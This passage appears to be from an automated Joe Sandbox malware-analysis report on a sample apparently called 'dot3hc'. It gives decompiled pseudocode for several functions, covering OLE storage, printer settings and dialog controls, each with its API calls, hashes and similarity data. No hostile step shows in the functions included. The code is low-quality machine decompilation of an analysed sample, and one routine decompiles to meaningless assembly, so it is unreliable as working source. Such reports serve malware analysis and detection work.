				 *((intOrPtr*)(__ecx + 0xe0)) = 0x436b64;
				_t48 = __ecx + 0xac;
				 *((intOrPtr*)(__ecx + 0xe4)) = 0x436b78;
				 *((intOrPtr*)(__ecx + 0xe8)) = 0x436ba4;
				E0041F330(0, _t48, 0, 0x10);
				 *_t48 = 0;
				return E0041F7C2(_t55);
			}

APIs

__EH_prolog3.LIBCMT ref: 00417FF4
_memset.LIBCMT ref: 004180E7

Strings

jC, xrefs: 00418097
dkC, xrefs: 004180C1
,kC, xrefs: 004180AB
DkC, xrefs: 004180B5
xkC, xrefs: 004180D2

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: H_prolog3_memset
String ID: ,kC$DkC$dkC$xkC$jC
API String ID: 2828583354-3858571362
Opcode ID: 98e60aecb42fe353695eeb357c2788e09d8f2f2acdddc0c39202814f6abeb3dc
Instruction ID: 4e71a2d175be7ae7ae6f7a1d80f1dc51b3f0f7cb739eefa1d1a8814e24de44bf
Opcode Fuzzy Hash: 98e60aecb42fe353695eeb357c2788e09d8f2f2acdddc0c39202814f6abeb3dc
Instruction Fuzzy Hash: E73190B0801B51DAD320DF2AC54578AFBE4BFA5308F11DA0FD1EA97661C7B86149CF29

Uniqueness

Uniqueness Score: -1.00%

Function 004148AC, Relevance: 12.3, APIs: 8, Instructions: 297
memoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E004148AC(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t114;
				intOrPtr _t118;
				intOrPtr* _t119;
				void* _t120;
				intOrPtr* _t121;
				void* _t122;
				intOrPtr* _t125;
				intOrPtr* _t127;
				void _t129;
				intOrPtr* _t131;
				long _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				void _t139;
				void _t141;
				void* _t143;
				void* _t144;
				void* _t147;
				void* _t148;
				void _t149;
				void* _t151;
				intOrPtr* _t153;
				void* _t154;
				void _t158;
				void* _t159;
				void _t161;
				intOrPtr* _t163;
				void* _t168;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr* _t174;
				void* _t175;
				intOrPtr _t186;
				intOrPtr* _t206;
				void* _t210;
				intOrPtr* _t219;
				intOrPtr* _t221;
				void* _t222;
				void* _t224;

				_push(0x68);
				_t114 = E0041F6EA(E00432DB2, __ebx, __edi, __esi);
				_t221 = __ecx;
				 *((intOrPtr*)(_t224 - 0x24)) = __ecx;
				_t219 = __ecx + 0x50;
				 *(_t224 - 0x10) = 0;
				if( *_t219 != 0) {
					L2:
					 *(_t224 + 8) = 0;
					 *(_t224 - 0x14) = 0;
					 *((intOrPtr*)(_t224 + 0x14)) = 0;
					E00413164(_t221, _t221 + 0x40);
					_t118 =  *((intOrPtr*)( *_t221 + 0xc0))();
					 *((intOrPtr*)(_t224 - 0x20)) = _t118;
					if(_t118 != 0) {
						L5:
						_t222 =  *(_t224 + 0xc);
						if(_t222 == 0) {
							__eflags =  *(_t224 + 0x10);
							if( *(_t224 + 0x10) != 0) {
								L16:
								_t119 =  *_t219;
								_t210 = _t224 - 0x14;
								_t120 =  *((intOrPtr*)( *_t119))(_t119, 0x439410, _t210);
								__eflags = _t120;
								if(_t120 < 0) {
									L43:
									if( *(_t224 - 0x10) >= 0) {
										L46:
										_t121 =  *((intOrPtr*)(_t224 + 0x14));
										if(_t121 != 0) {
											 *((intOrPtr*)( *_t121 + 8))(_t121);
										}
										if( *((intOrPtr*)(_t224 - 0x20)) != 0 &&  *(_t224 - 0x10) >= 0) {
											 *(_t224 - 0x10) = 1;
										}
										_t122 =  *(_t224 - 0x10);
										L52:
										return E0041F7C2(_t122);
									}
									L44:
									_t125 =  *_t219;
									if(_t125 != 0) {
										 *((intOrPtr*)( *_t125 + 0x18))(_t125, 1);
										_t127 =  *_t219;
										 *((intOrPtr*)( *_t127 + 8))(_t127);
										 *_t219 = 0;
									}
									goto L46;
								}
								__eflags = _t222;
								if(_t222 != 0) {
									__eflags =  *(_t224 + 0x10);
									if( *(_t224 + 0x10) == 0) {
										 *(_t224 - 0x10) = 0x8000ffff;
										L37:
										_t129 =  *(_t224 - 0x14);
										L38:
										 *((intOrPtr*)( *_t129 + 8))(_t129);
										L39:
										if( *(_t224 - 0x10) < 0) {
											goto L44;
										}
										if( *((intOrPtr*)(_t224 - 0x20)) == 0) {
											_t186 =  *((intOrPtr*)(_t224 - 0x24));
											if(( *(_t186 + 0x70) & 0x00020000) == 0) {
												_t131 =  *_t219;
												 *(_t224 - 0x10) =  *((intOrPtr*)( *_t131 + 0xc))(_t131, _t186 + 0xc8);
											}
										}
										goto L43;
									}
									_t134 =  *((intOrPtr*)( *_t222 + 0x30))();
									__eflags = _t210;
									 *(_t224 - 0x2c) = _t134;
									if(__eflags > 0) {
										L29:
										 *(_t224 - 0x10) = 0x8007000e;
										 *(_t224 + 0x10) = 0;
										L30:
										__eflags =  *(_t224 + 0x10);
										 *(_t224 - 0x1c) = 0;
										if( *(_t224 + 0x10) == 0) {
											goto L37;
										}
										_t135 = _t224 - 0x1c;
										__imp__CreateILockBytesOnHGlobal( *(_t224 + 0x10), 1, _t135);
										__eflags = _t135;
										 *(_t224 - 0x10) = _t135;
										if(_t135 < 0) {
											goto L37;
										}
										_t136 = _t224 - 0x18;
										 *(_t224 - 0x18) = 0;
										__imp__StgOpenStorageOnILockBytes( *(_t224 - 0x1c), 0, 0x12, 0, 0, _t136);
										__eflags = _t136;
										 *(_t224 - 0x10) = _t136;
										if(_t136 >= 0) {
											_t139 =  *(_t224 - 0x14);
											 *(_t224 - 0x10) =  *((intOrPtr*)( *_t139 + 0x18))(_t139,  *(_t224 - 0x18));
											_t141 =  *(_t224 - 0x18);
											 *((intOrPtr*)( *_t141 + 8))(_t141);
										}
										_t137 =  *(_t224 - 0x1c);
										L35:
										 *((intOrPtr*)( *_t137 + 8))(_t137);
										goto L37;
									}
									if(__eflags < 0) {
										L26:
										_t143 = GlobalAlloc(0, _t134);
										__eflags = _t143;
										 *(_t224 + 0x10) = _t143;
										if(_t143 == 0) {
											goto L29;
										}
										_t144 = GlobalLock(_t143);
										__eflags = _t144;
										if(_t144 == 0) {
											goto L29;
										}
										 *((intOrPtr*)( *_t222 + 0x34))(_t144,  *(_t224 - 0x2c));
										GlobalUnlock( *(_t224 + 0x10));
										goto L30;
									}
									__eflags = _t134 - 0xffffffff;
									if(_t134 >= 0xffffffff) {
										goto L29;
									}
									goto L26;
								}
								_t147 = _t224 + 0xc;
								 *(_t224 + 0xc) = 0;
								__imp__CreateILockBytesOnHGlobal(0, 1, _t147);
								__eflags = _t147;
								 *(_t224 - 0x10) = _t147;
								if(_t147 < 0) {
									goto L37;
								}
								_t148 = _t224 + 0x10;
								 *(_t224 + 0x10) = 0;
								__imp__StgCreateDocfileOnILockBytes( *(_t224 + 0xc), 0x1012, 0, _t148);
								__eflags = _t148;
								 *(_t224 - 0x10) = _t148;
								if(_t148 >= 0) {
									_t149 =  *(_t224 - 0x14);
									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t149 + 0x14))(_t149,  *(_t224 + 0x10));
									_t151 =  *(_t224 + 0x10);
									 *((intOrPtr*)( *_t151 + 8))(_t151);
								}
								_t137 =  *(_t224 + 0xc);
								goto L35;
							}
							L11:
							_t153 =  *_t219;
							_t213 = _t224 + 8;
							_t154 =  *((intOrPtr*)( *_t153))(_t153, 0x4394a0, _t224 + 8);
							__eflags = _t154;
							if(_t154 < 0) {
								goto L16;
							} else {
								__eflags = _t222;
								if(__eflags != 0) {
									E00411776(0, _t224 - 0x74, _t213, _t219, _t222, __eflags);
									 *(_t224 - 4) = 0;
									E0041D04F(_t224 - 0x2c, _t224 - 0x74);
									_t158 =  *(_t224 + 8);
									_t159 =  *((intOrPtr*)( *_t158 + 0x14))(_t158, _t224 - 0x2c, _t222, 1, 0x1000, 0);
									_t47 = _t224 - 4;
									 *_t47 =  *(_t224 - 4) | 0xffffffff;
									__eflags =  *_t47;
									 *(_t224 - 0x10) = _t159;
									E00411738(0, _t224 - 0x74, _t224 - 0x2c, _t219, _t222,  *_t47);
								} else {
									_t161 =  *(_t224 + 8);
									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t161 + 0x20))(_t161);
								}
								_t129 =  *(_t224 + 8);
								goto L38;
							}
						}
						if( *(_t224 + 0x10) != 0) {
							goto L16;
						}
						_t163 =  *_t219;
						_push(_t224 + 0x14);
						_push(0x4394b0);
						_push(_t163);
						if( *((intOrPtr*)( *_t163))() < 0) {
							goto L11;
						}
						_push(0);
						_push(0);
						_push(0);
						_push(3);
						if( *((intOrPtr*)( *_t222 + 0x50))() == 0) {
							goto L11;
						} else {
							 *(_t224 + 0x10) = 0;
							_t168 =  *((intOrPtr*)( *_t222 + 0x50))(0, 0xffffffff, _t224 + 0x10, _t224 + 0xc);
							_t206 =  *((intOrPtr*)(_t224 + 0x14));
							 *(_t224 - 0x10) =  *((intOrPtr*)( *_t206 + 0x14))(_t206,  *(_t224 + 0x10), _t168);
							_t170 =  *((intOrPtr*)(_t224 + 0x14));
							 *((intOrPtr*)( *_t170 + 8))(_t170);
							 *((intOrPtr*)(_t224 + 0x14)) = 0;
							goto L39;
						}
					}
					_t172 =  *_t219;
					 *((intOrPtr*)( *_t172 + 0x58))(_t172, 1, _t221 + 0x70);
					if(( *(_t221 + 0x70) & 0x00020000) == 0) {
						goto L5;
					}
					_t174 =  *_t219;
					_t175 =  *((intOrPtr*)( *_t174 + 0xc))(_t174, _t221 + 0xc8);
					 *(_t224 - 0x10) = _t175;
					if(_t175 < 0) {
						goto L44;
					}
					goto L5;
				}
				_t122 = E00412F6B(_t114, __ecx,  *(_t224 + 8), 0, 3, 0x439390, _t219,  *((intOrPtr*)(_t224 + 0x14)));
				 *(_t224 - 0x10) = _t122;
				if(_t122 < 0) {
					goto L52;
				}
				goto L2;
			}

APIs

__EH_prolog3.LIBCMT ref: 004148B3

Part of subcall function 00412F6B: SysStringLen.OLEAUT32(?), ref: 00412F73
Part of subcall function 00412F6B: CoGetClassObject.OLE32(?,?,00000000,004393D0,?), ref: 00412F91

CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 00414A3D
StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 00414A5E
GlobalAlloc.KERNEL32(00000000,00000000), ref: 00414AAB
GlobalLock.KERNEL32 ref: 00414AB9
GlobalUnlock.KERNEL32(?), ref: 00414AD1
CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 00414AF4
StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 00414B10

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
String ID:
API String ID: 317715441-0
Opcode ID: f13fa0fecad93a40aca0f4cab5c0fbf99db1ea20b7f5c39c287bbb21db593fda
Instruction ID: 234c5863126d79d24c7a543b411d71e2f8900e6cec6980265dfd09f5a00c5f11
Opcode Fuzzy Hash: f13fa0fecad93a40aca0f4cab5c0fbf99db1ea20b7f5c39c287bbb21db593fda
Instruction Fuzzy Hash: 09C1ECB090020A9FCB10DFA5C884AEEB7B9FF88345B10456EF515EB290D775ED91CB54

Uniqueness

Uniqueness Score: -1.00%

Function 022E14A0, Relevance: 12.2, APIs: 8, Instructions: 171COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000007F), ref: 022E14DB
SetLastError.KERNEL32(0000007F), ref: 022E1507

Memory Dump Source

Source File: 00000003.00000002.615064004.00000000022E1000.00000020.00000001.sdmp, Offset: 022E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22e1000_dot3hc.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: b392eaa855e2556c3c299e74ddc0260ac1cce0548f56da6eebaba5528958dc5d
Instruction ID: 9e0e9b689e5a90d71041b214f57fdeb8b76b0fa44c0bc561b64cdff83f3bc898
Opcode Fuzzy Hash: b392eaa855e2556c3c299e74ddc0260ac1cce0548f56da6eebaba5528958dc5d
Instruction Fuzzy Hash: 0B71C2B4E20109EFCB08DF94C594AADB7B2FF48304F6485A8D41AAB345D774AE91DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00403DEB, Relevance: 12.1, APIs: 8, Instructions: 65
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00403DEB(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x74);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x70);
							if( *(_t35 + 0x70) != 0) {
								E0040F775(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x70) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E0040F775( *(_t35 + 0x70));
								 *(_t35 + 0x70) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

APIs

GlobalLock.KERNEL32 ref: 00403E08
lstrcmpA.KERNEL32(?,?), ref: 00403E14
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 00403E26
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00403E46
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00403E4E
GlobalLock.KERNEL32 ref: 00403E58
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 00403E65
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 00403E7D

Part of subcall function 0040F775: GlobalFlags.KERNEL32(?), ref: 0040F780
Part of subcall function 0040F775: GlobalUnlock.KERNEL32(?,?,?,00403BCA,?,00000004,004011AF), ref: 0040F792
Part of subcall function 0040F775: GlobalFree.KERNEL32 ref: 0040F79D

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: deb0bda6af114da4f7ded021d2b5c250483e039ecf8471d16094a6eb54607884
Instruction ID: ac421361bb6fd67369ebe5b5881472c41486625af2fb4b5e452b01b71c6537f7
Opcode Fuzzy Hash: deb0bda6af114da4f7ded021d2b5c250483e039ecf8471d16094a6eb54607884
Instruction Fuzzy Hash: 52119171500604BBDB216FB6DC49DAF7AACFB88744B00056EFA05E2561D779DA00D768

Uniqueness

Uniqueness Score: -1.00%

Function 00407270, Relevance: 10.8, APIs: 7, Instructions: 255
memoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00407270(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t133;
				intOrPtr* _t140;
				int _t145;
				signed short _t148;
				short* _t149;
				intOrPtr _t152;
				signed short _t177;
				intOrPtr _t178;
				signed int _t179;
				intOrPtr _t184;
				struct tagRECT _t189;
				int _t190;
				void* _t191;
				signed short _t193;
				signed short _t194;
				void* _t195;
				void* _t221;
				intOrPtr _t225;
				short _t226;
				intOrPtr* _t233;
				void* _t234;
				signed short* _t236;
				signed int _t240;
				void* _t241;
				signed short* _t242;
				signed short* _t244;
				signed short* _t245;
				signed int _t246;
				void* _t248;

				_t246 = _t248 - 0x44;
				_t133 =  *0x443590; // 0x8ffedb05
				 *(_t246 + 0x48) = _t133 ^ _t246;
				_push(0x50);
				E0041F6EA(E00431F26, __ebx, __edi, __esi);
				_t233 =  *((intOrPtr*)(_t246 + 0x60));
				_t236 =  *(_t246 + 0x68);
				 *((intOrPtr*)(_t246 + 0x1c)) =  *((intOrPtr*)(_t246 + 0x54));
				 *(_t246 + 8) =  *(_t246 + 0x58);
				 *((intOrPtr*)(_t246 + 0x14)) =  *((intOrPtr*)(_t246 + 0x70));
				_t140 = _t233 + 0x12;
				 *((intOrPtr*)(_t246 + 0x2c)) = _t140;
				if( *((intOrPtr*)(_t246 + 0x5c)) != 0) {
					 *((intOrPtr*)(_t246 - 0x20)) =  *((intOrPtr*)(_t233 + 8));
					 *((intOrPtr*)(_t246 - 0x1c)) =  *((intOrPtr*)(_t233 + 4));
					 *((short*)(_t246 - 0x18)) =  *((intOrPtr*)(_t233 + 0xc));
					 *((short*)(_t246 - 0x16)) =  *((intOrPtr*)(_t233 + 0xe));
					 *((short*)(_t246 - 0x12)) =  *_t140;
					_t225 = _t233 + 0x18;
					 *((short*)(_t246 - 0x14)) =  *(_t233 + 0x10);
					 *((short*)(_t246 - 0x10)) =  *((intOrPtr*)(_t233 + 0x14));
					_t233 = _t246 - 0x20;
					 *((intOrPtr*)(_t246 + 0x2c)) = _t225;
				}
				_t226 =  *((short*)(_t233 + 0xa));
				_t189 =  *((short*)(_t233 + 8));
				 *((intOrPtr*)(_t246 - 0x24)) =  *((short*)(_t233 + 0xe)) + _t226;
				 *(_t246 - 0x30) = _t189;
				 *((intOrPtr*)(_t246 - 0x2c)) = _t226;
				 *((intOrPtr*)(_t246 - 0x28)) =  *((short*)(_t233 + 0xc)) + _t189;
				_t145 = MapDialogRect( *( *((intOrPtr*)(_t246 + 0x1c)) + 0x20), _t246 - 0x30);
				 *(_t246 + 0x24) =  *(_t246 + 0x24) & 0x00000000;
				if( *((intOrPtr*)(_t246 + 0x6c)) >= 4) {
					_t194 =  *_t236;
					 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - 4;
					_t236 =  &(_t236[2]);
					if(_t194 > 0) {
						__imp__#4(_t236, _t194);
						_t195 = _t194 + _t194;
						_t236 = _t236 + _t195;
						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t195;
						 *(_t246 + 0x24) = _t145;
					}
				}
				 *(_t246 + 0x20) =  *(_t246 + 0x20) & 0x00000000;
				E0040320E(_t246 + 0x28, E0040EA5E());
				 *((intOrPtr*)(_t246 - 4)) = 0;
				 *(_t246 + 0xc) = 0;
				 *(_t246 + 0x10) = 0;
				 *(_t246 + 0x18) = 0;
				if( *((short*)(_t246 + 0x64)) == 0x37a ||  *((short*)(_t246 + 0x64)) == 0x37b) {
					_t148 =  *_t236;
					_t57 = _t148 - 0xc; // -12
					_t226 = _t57;
					_t236 =  &(_t236[6]);
					 *_t246 = _t148;
					 *((intOrPtr*)(_t246 + 0x30)) = _t226;
					if(_t226 <= 0) {
						L16:
						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t148;
						 *((intOrPtr*)(_t246 + 0x64)) =  *((intOrPtr*)(_t246 + 0x64)) + 0xfffc;
						goto L17;
					} else {
						goto L8;
					}
					do {
						L8:
						_t177 =  *_t236;
						 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) - 6;
						_t242 =  &(_t236[2]);
						_t193 =  *_t242 & 0x0000ffff;
						_t236 =  &(_t242[1]);
						 *(_t246 + 4) = _t177;
						if(_t177 != 0x80010001) {
							_t178 = E00402EE1(__eflags, 0x1c);
							 *((intOrPtr*)(_t246 - 0x34)) = _t178;
							__eflags = _t178;
							 *((char*)(_t246 - 4)) = 1;
							if(_t178 == 0) {
								_t179 = 0;
								__eflags = 0;
							} else {
								_t179 = E00413E1A(_t178,  *(_t246 + 0x20),  *(_t246 + 4), _t193);
							}
							 *((char*)(_t246 - 4)) = 0;
							 *(_t246 + 0x20) = _t179;
						} else {
							_t244 =  &(_t236[2]);
							 *(_t246 + 0x10) =  *_t236;
							_t245 =  &(_t244[6]);
							 *(_t246 + 0x18) =  *_t244;
							E00403507(_t246 + 0x28, _t245);
							_t184 =  *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x28)) - 0xc));
							_t221 = 0xffffffef;
							 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) + _t221 - _t184;
							_t236 = _t245 + _t184 + 1;
							 *(_t246 + 0xc) = _t193 & 0x0000ffff;
						}
					} while ( *((intOrPtr*)(_t246 + 0x30)) > 0);
					_t148 =  *_t246;
					goto L16;
				} else {
					L17:
					_t149 =  *((intOrPtr*)(_t246 + 0x2c));
					_t263 =  *_t149 - 0x7b;
					_push(_t246 + 0x38);
					_push(_t149);
					if( *_t149 != 0x7b) {
						__imp__CLSIDFromProgID();
					} else {
						__imp__CLSIDFromString();
					}
					_t190 = 0;
					_push(0);
					_push( *((intOrPtr*)(_t246 + 0x6c)));
					_push(_t236);
					 *((intOrPtr*)(_t246 + 0x2c)) = _t149;
					E004199DF(0, _t246 - 0x5c, _t233, _t236, _t263);
					 *((char*)(_t246 - 4)) = 2;
					 *((intOrPtr*)(_t246 + 0x34)) = 0;
					asm("sbb esi, esi");
					_t240 =  ~( *((intOrPtr*)(_t246 + 0x64)) - 0x378) & _t246 - 0x0000005c;
					_t264 =  *((intOrPtr*)(_t246 + 0x2c));
					if( *((intOrPtr*)(_t246 + 0x2c)) >= 0) {
						_push(1);
						if(E00411CB5(0,  *((intOrPtr*)(_t246 + 0x1c)), _t233, _t240, _t264) != 0 && E00412252( *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x1c)) + 0x4c)), 0, _t246 + 0x38, 0,  *_t233, _t246 - 0x30,  *(_t233 + 0x10) & 0x0000ffff, _t240, 0 |  *((short*)(_t246 + 0x64)) == 0x00000377,  *(_t246 + 0x24), _t246 + 0x34) != 0) {
							E0041343B( *((intOrPtr*)(_t246 + 0x34)), 1);
							SetWindowPos( *( *((intOrPtr*)(_t246 + 0x34)) + 0x24),  *(_t246 + 8), 0, 0, 0, 0, 0x13);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x94) =  *(_t246 + 0x20);
							E004071CF( *((intOrPtr*)(_t246 + 0x34)) + 0xa4, _t246, _t246 + 0x28);
							 *((short*)( *((intOrPtr*)(_t246 + 0x34)) + 0x98)) =  *(_t246 + 0xc);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x9c) =  *(_t246 + 0x10);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0xa0) =  *(_t246 + 0x18);
						}
					}
					if( *(_t246 + 0x24) != _t190) {
						__imp__#6( *(_t246 + 0x24));
					}
					_t152 =  *((intOrPtr*)(_t246 + 0x34));
					if(_t152 == _t190) {
						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) = _t190;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) =  *((intOrPtr*)(_t152 + 0x24));
						_t190 = 1;
					}
					 *((char*)(_t246 - 4)) = 0;
					E00419D41(_t190, _t246 - 0x5c, _t226, _t233, _t240, 1);
					E00403036( *((intOrPtr*)(_t246 + 0x28)) + 0xfffffff0, _t226);
					 *[fs:0x0] =  *((intOrPtr*)(_t246 - 0xc));
					_pop(_t234);
					_pop(_t241);
					_pop(_t191);
					return E0041E5DF(_t190, _t191,  *(_t246 + 0x48) ^ _t246, _t226, _t234, _t241);
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 00407289
MapDialogRect.USER32(?,00000000), ref: 0040731A
SysAllocStringLen.OLEAUT32(?,?), ref: 00407339
CLSIDFromString.OLE32(?,?,00000000), ref: 0040742B

Part of subcall function 00402EE1: _malloc.LIBCMT ref: 00402EFB

CLSIDFromProgID.OLE32(?,?,00000000), ref: 00407433
SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013,00000001,00000000,?,00000000,?,00000000,00000000,0000FC84,00000000), ref: 004074CD
SysFreeString.OLEAUT32(00000000), ref: 0040751F

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
String ID:
API String ID: 2841959276-0
Opcode ID: 1308482831191b4023c7861a20e543ac11ade589bc15574cbf101fd2d2cc8799
Instruction ID: 448c8c2dcd699e09b9d85336ea3713344f7c4e017cbfbbdeab4c9df7cebc7252
Opcode Fuzzy Hash: 1308482831191b4023c7861a20e543ac11ade589bc15574cbf101fd2d2cc8799
Instruction Fuzzy Hash: FBB10671904209AFDB04DF69C984AEE7BB4FF08318F00452AFC19A7391E778E994CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00418A33, Relevance: 10.6, APIs: 7, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418A33(signed int __eax) {

				asm("lds ebp, [ecx+ecx*8-0x3e]");
				 *__eax =  *__eax | __eax;
			}

0x00418a33
0x00418a37

APIs

__EH_prolog3.LIBCMT ref: 00418A40
_memset.LIBCMT ref: 00418AAC

Part of subcall function 0041A7E4: _memset.LIBCMT ref: 0041A7EC

VariantClear.OLEAUT32(?), ref: 00418AEC
SysFreeString.OLEAUT32(00000000), ref: 00418B6D
SysFreeString.OLEAUT32(00000000), ref: 00418B7C
SysFreeString.OLEAUT32(00000000), ref: 00418B8B
VariantClear.OLEAUT32(00000000), ref: 00418BA0

Part of subcall function 0041A7C4: VariantCopy.OLEAUT32(?,?), ref: 0041A7D2

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: FreeStringVariant$Clear_memset$CopyH_prolog3
String ID:
API String ID: 883085156-0
Opcode ID: 18a5db97fe09296ebc22d1f71aec940bc2ead0d2ae3222a38423bdfbdea22666
Instruction ID: e5905b9386fbc3a182e4f73bdb5b86b4c3549b20c445dd11c0baad671bbe4cf2
Opcode Fuzzy Hash: 18a5db97fe09296ebc22d1f71aec940bc2ead0d2ae3222a38423bdfbdea22666
Instruction Fuzzy Hash: 90511DB1900209DFDB10CFA4C885BDEB7B4FF48304F14456EE515E7291DB78A985CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004157D0, Relevance: 10.6, APIs: 7, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E004157D0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t59;
				signed int _t63;
				signed int _t64;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				void* _t81;
				intOrPtr* _t82;
				void* _t97;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t103;

				_t103 = __eflags;
				_push(0x60);
				E0041F6EA(E00432F66, __ebx, __edi, __esi);
				_t97 =  *(_t101 + 8) + 0xffffff28;
				E0040DBE0(_t101 - 0x18, _t103,  *((intOrPtr*)( *(_t101 + 8) - 0xbc)));
				 *(_t101 - 4) = 0;
				if( *((intOrPtr*)(_t97 + 0x88)) != 0) {
					L19:
